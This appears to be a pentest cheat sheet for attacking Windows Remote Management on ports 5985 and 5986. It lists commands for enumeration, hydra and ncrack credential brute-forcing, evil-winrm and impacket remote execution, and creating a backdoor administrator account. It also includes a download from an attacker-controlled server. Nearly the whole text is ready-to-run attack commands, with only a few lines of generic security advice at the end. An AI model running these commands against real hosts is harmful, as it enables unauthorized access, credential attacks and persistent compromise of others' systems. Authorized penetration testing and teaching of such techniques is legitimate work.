WinRM 5985,5986

WinRM Enumeration and Scanning (Ports 5985, 5986)

Replace <target_ip> with the actual IP address of the target.

# Define the target IP
export TARGET_IP="192.168.1.100"

nmap -p 5985,5986 -sV --script http-winrm-enum <target_ip>

Explanation:

Connect to the WinRM service:

evil-winrm -i <target_ip> -u <username> -p <password>

Use crackmapexec for WinRM authentication testing:

crackmapexec winrm <target_ip> -u <username> -p <password>

Use the WinRM login scanner module:

use auxiliary/scanner/winrm/winrm_login
set RHOSTS <target_ip>
set USERNAME <username>
set PASSWORD <password>
run

Use hydra to brute-force WinRM credentials:

hydra -L usernames.txt -P passwords.txt -s 5985 <target_ip> http-winrm

Use ncrack for credential brute-forcing:

ncrack -vv --user <username> -P passwords.txt winrm://<target_ip>

Once connected to WinRM, enumerate privileges using PowerShell commands:
```
whoami /priv
```
Check group memberships:
```
net user <username>
```

Use impacket for executing commands:

wmiexec.py <domain>/<user>:<password>@<target_ip>

Create a new user:

net user /add <new_user> <password>
net localgroup administrators <new_user> /add

Use PowerShell to copy files to a remote server:

Invoke-WebRequest -Uri http://<your_server>/file -OutFile <path>

Ensure tools like evil-winrm, crackmapexec, and hydra are installed for effective testing.
Document all findings during enumeration.
Use encrypted WinRM (port 5986) for better security.
Handle credentials securely during testing.

Last updated 5 months ago